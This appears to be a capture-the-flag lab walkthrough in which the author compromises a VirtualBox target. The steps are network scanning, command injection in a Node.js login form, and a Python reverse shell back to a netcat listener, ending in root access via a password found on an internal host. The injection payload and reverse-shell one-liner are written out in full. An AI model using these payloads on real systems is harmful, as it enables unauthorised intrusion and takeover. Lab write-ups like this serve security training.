				ENUMERATION

---netdiscover---    
                                                                                                                  
┌──(root㉿kali)-[/home/okina]
└─# netdiscover -i eth0 -r 10.0.2.0/24 -c 200
 Currently scanning: 10.0.2.0/24   |   Screen View: Unique Hosts                                                     
                                                                                                                     
 60 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 3600                                                   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.0.2.1        52:54:00:12:35:00     15     900  Unknown vendor                                                    
 10.0.2.2        52:54:00:12:35:00     15     900  Unknown vendor                                                    
 10.0.2.3        08:00:27:42:79:fa     15     900  PCS Systemtechnik GmbH                                            
 10.0.2.27       08:00:27:59:17:9e     15     900  PCS Systemtechnik GmbH                                            


---nmap---
                                                                                                                      
┌──(root㉿kali)-[/home/okina/Desktop]
└─# nmap 10.0.2.27 -sS -sC -sV -A -T4       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-25 14:56 +03
Nmap scan report for 10.0.2.27
Host is up (0.00076s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: L&#214;SEV | L&#246;semili &#199;ocuklar Vakf\xC4\xB1
3000/tcp open  http    Node.js (Express middleware)
|_http-title: Login Page
MAC Address: 08:00:27:59:17:9E (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 4.15 - 5.8 (95%), Linux 5.0 - 5.5 (94%), Linux 5.0 - 5.4 (92%), Linux 2.6.32 (91%), Linux 3.2 - 4.9 (91%), Linux 2.6.32 - 3.10 (91%), Linux 5.3 - 5.4 (90%), Linux 5.4 (90%), Linux 3.4 - 3.10 (89%), Linux 3.3 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.76 ms 10.0.2.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.50 seconds




----in our nmap scan we see that port 3000 is open, when we check 10.0.2.27:3000 we see a login page, lets try to ping ourselves to see if there is a connection----

┌──(root㉿kali)-[/home/okina/Desktop]
└─# tcpdump -i eth0       
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes

---and then in the webpage---

;ping 10.0.2.15


---our listener works, the connection is stable--- 

15:40:29.557796 ARP, Request who-has _gateway tell kali, length 28
15:40:29.558459 ARP, Reply _gateway is-at 52:54:00:12:35:00 (oui Unknown), length 46
15:40:29.578612 IP kali.54456 > dns.google.domain: 26555+ [1au] PTR? 1.2.0.10.in-addr.arpa. (50)
15:40:29.578846 IP kali.mdns > mdns.mcast.net.mdns: 0 PTR (QM)? 1.2.0.10.in-addr.arpa. (39)
15:40:29.610763 IP dns.google.domain > kali.54456: 26555 NXDomain 0/0/1 (50)
15:40:29.857698 IP kali.57668 > _gateway.5355: Flags [S], seq 1316950602, win 32120, options [mss 1460,sackOK,TS val 1086048118 ecr 0,nop,wscale 7,tfo  cookiereq,nop,nop], length 0
15:40:29.857937 IP _gateway.5355 > kali.57668: Flags [R.], seq 0, ack 1316950603, win 32768, length 0
15:40:30.609238 IP kali.mdns > mdns.mcast.net.mdns: 0 PTR (QM)? 1.2.0.10.in-addr.arpa. (39)
15:40:32.857592 IP kali.mdns > mdns.mcast.net.mdns: 0 PTR (QM)? 1.2.0.10.in-addr.arpa. (39)
15:40:37.108827 IP kali.60961 > dns.google.domain: 27789+ [1au] PTR? 15.2.0.10.in-addr.arpa. (51)
15:40:37.141177 IP dns.google.domain > kali.60961: 27789 NXDomain 0/0/1 (51)
15:40:37.143935 IP kali.51962 > dns.google.domain: 19529+ [1au] PTR? 8.8.8.8.in-addr.arpa. (49)
15:40:37.144539 IP kali.mdns > mdns.mcast.net.mdns: 0 PTR (QM)? 8.8.8.8.in-addr.arpa. (38)
15:40:37.178664 IP dns.google.domain > kali.51962: 19529 1/0/1 PTR dns.google. (73)



---now lets search for a reverse shell, I visit gtfobins.com and revshells.com ----


----I find this shell----

;python3 -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.15",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'                                                         


						



						GAINING FOOTHOLD


---Start the listener----

┌──(root㉿kali)-[/home/okina/Desktop]
└─# nc -nvlp 4242
listening on [any] 4242 ...


----and in the login form----

;python3 -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.15",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'                                                         


----connection works, we are in----

┌──(root㉿kali)-[/home/okina/Desktop]
└─# nc -nvlp 4242
listening on [any] 4242 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.27] 56630
/bin/sh: 0: can't access tty; job control turned off
$ whoami
azer
$ ls
get.sh
node_modules
package.json
package-lock.json
server.js
user.txt
$ cat user.txt
---First User Flag---




					PRIVILEGE ESCALATION


---lets get info of the subnet of this network---

$ ip a s
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:59:17:9e brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.27/24 brd 10.0.2.255 scope global dynamic enp0s3
       valid_lft 534sec preferred_lft 534sec
    inet6 fe80::a00:27ff:fe59:179e/64 scope link 
       valid_lft forever preferred_lft forever
3: br-333bcb432cd5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:0e:fc:fd:74 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.1/24 brd 10.10.10.255 scope global br-333bcb432cd5
       valid_lft forever preferred_lft forever
    inet6 fe80::42:eff:fefc:fd74/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:65:3e:6b:bc brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
6: vetha3a8f9b@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-333bcb432cd5 state UP group default 
    link/ether 22:aa:1d:df:c3:a9 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::20aa:1dff:fedf:c3a9/64 scope link 
       valid_lft forever preferred_lft forever


---here we see IP adress ranges 10.0.2.27/24 and 10.10.10.1/24, we can scan those using nmap once again----


┌──(root㉿kali)-[/opt/PEASS-ng/linPEAS]
└─# nmap 10.10.10.0/24 -sS -sC -sV -A -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-25 21:28 +03
Nmap scan report for 10.10.10.0
Host is up (0.00075s latency).
All 1000 scanned ports on 10.10.10.0 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: firewall|router
Running: Cisco ASA 9.X, Synology embedded
OS CPE: cpe:/a:cisco:adaptive_security_appliance_software:9.2 cpe:/h:synology:rt1900ac
OS details: Cisco Adaptive Security Appliance (ASA 9.2), Synology RT1900ac router
Network Distance: 1 hop

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   3.06 ms 10.10.10.0

Nmap scan report for 10.10.10.1
Host is up (0.00070s latency).
All 1000 scanned ports on 10.10.10.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: firewall|router
Running: Cisco ASA 9.X, Synology embedded
OS CPE: cpe:/a:cisco:adaptive_security_appliance_software:9.2 cpe:/h:synology:rt1900ac
OS details: Cisco Adaptive Security Appliance (ASA 9.2), Synology RT1900ac router
Network Distance: 1 hop

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   3.01 ms 10.10.10.1

Nmap scan report for 10.10.10.2
Host is up (0.00070s latency).
All 1000 scanned ports on 10.10.10.2 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: firewall|router
Running: Cisco ASA 9.X, Synology embedded
OS CPE: cpe:/a:cisco:adaptive_security_appliance_software:9.2 cpe:/h:synology:rt1900ac
OS details: Cisco Adaptive Security Appliance (ASA 9.2), Synology RT1900ac router
Network Distance: 1 hop

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   2.90 ms 10.10.10.2

Nmap scan report for 10.10.10.3
Host is up (0.00065s latency).
All 1000 scanned ports on 10.10.10.3 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: firewall|router
Running: Cisco ASA 9.X, Synology embedded
OS CPE: cpe:/a:cisco:adaptive_security_appliance_software:9.2 cpe:/h:synology:rt1900ac
OS details: Cisco Adaptive Security Appliance (ASA 9.2), Synology RT1900ac router
Network Distance: 1 hop

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   2.38 ms 10.10.10.3

Nmap scan report for 10.10.10.4
Host is up (0.00045s latency).
All 1000 scanned ports on 10.10.10.4 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: firewall|router
Running: Cisco ASA 9.X, Synology embedded
OS CPE: cpe:/a:cisco:adaptive_security_appliance_software:9.2 cpe:/h:synology:rt1900ac
OS details: Cisco Adaptive Security Appliance (ASA 9.2), Synology RT1900ac router
Network Distance: 1 hop

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   1.06 ms 10.10.10.4

Nmap scan report for 10.10.10.5
Host is up (0.00034s latency).
All 1000 scanned ports on 10.10.10.5 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: firewall|router
Running: Cisco ASA 9.X, Synology embedded
OS CPE: cpe:/a:cisco:adaptive_security_appliance_software:9.2 cpe:/h:synology:rt1900ac
OS details: Cisco Adaptive Security Appliance (ASA 9.2), Synology RT1900ac router
Network Distance: 1 hop

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.57 ms 10.10.10.5

Nmap scan report for 10.10.10.6
Host is up (0.00038s latency).
All 1000 scanned ports on 10.10.10.6 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: firewall|router
Running: Cisco ASA 9.X, Synology embedded
OS CPE: cpe:/a:cisco:adaptive_security_appliance_software:9.2 cpe:/h:synology:rt1900ac
OS details: Cisco Adaptive Security Appliance (ASA 9.2), Synology RT1900ac router
Network Distance: 1 hop


---this scan takes long and the results dont seem to differ from one another, I will try to curl those adresses to see if any different result comes up---

---when I came to this adress---

$ curl 10.10.10.10
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    17  100    17    0     0   4982      0 --:--:-- --:--:-- --:--:--  5666
.:.AzerBulbul.:.


---We find this output, which is probably the password of the root user---

$ su root
Password: .:.AzerBulbul.:.

whoami
root

---boom, we are root, lets search for the flag---

cd /root

ls
root.txt

cat root.txt	
---Root User Flag---


